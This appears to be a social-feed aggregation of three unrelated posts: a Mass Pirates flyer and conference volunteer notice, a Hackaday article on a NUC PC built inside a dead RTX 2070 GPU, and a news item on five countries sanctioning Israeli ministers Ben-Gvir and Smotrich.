If you want to come up with a better version of the filer, email us and we will send you the editable Scribus document. Scribus is a libre desktop publishing application similar to In Design, PageMaker or QuarkXPress. If you want to create your own in another desktop publishing application, the original images are at:

• Different versions of our logo;
• Pirate Ship Side Bar.

Want to Help?

If you can help with the conference, please take a look at our conference pirate pad and put your name down for anything you will do.

Thanks to our friends at Agaric for hosting Community Bridge.

masspirates.org/blog/2025/06/1…

The CherryTree-modded card next to the original RTX 2070 GPU. (Credit: Gamers Nexus)
In the olden days of the 1990s and early 2000s, PCs were big and videocards were small-ish add-in boards that blended in with other ISA, PCI and AGP cards. These days, however, videocards are big and computers are increasingly smaller. That’s why US-based CherryTree Computers did what everyone has been joking about, and installed a PC inside a GPU, with [Gamers Nexus] having the honors of poking at the creatively titled GeeFarce 5027POS Micro Computer.

As CherryTree describes it on their website, this one-off build was the result of a joke about how GPUs nowadays are more expensive than the rest of the PC combined. Thus they did what any reasonable person would do and put an Asus NUC 13 with a 13th gen Core i7, 64 GB of and 2 TB of NVMe storage inside an (already dead) Asus Aorus RTX 2070 GPU.

In the [Gamers Nexus] video we can see that it’s definitely a quick-and-dirty build, with plenty of heatshrink and wires running everywhere in addition to the chopped off original heatsink. That said, from a few meter away it still looks like a GPU, can be installed like a GPU (but the PCIe connector does nothing) and is in the end a NUC PC inside a GPU shell that you can put a couple of inside a PC case.

Presumably the next project we’ll see in this vein will see a full-blown x86 system grafted inside a still functioning GPU, which would truly make the ‘install the PC inside the GPU’ meme a reality.

youtube.com/embed/wAmu_HnQAo8?…

hackaday.com/2025/06/10/using-…

The U.K., Canada, Australia, New Zealand and Norway announced that they are imposing sanctions on Israeli ministers Itamar Ben-Gvir and Bezalel Smotrich, for inciting violence against Palestinians in the West Bank." In a joint statement, the five countries charged Ben-Gvir and Smotrich with inciting "extremist violence and serious abuses of Palestinian human rights."

The statement added that "the Israeli Government must uphold its obligations under international law, and we call on it to take meaningful action to end extremist, violent and expansionist rhetoric."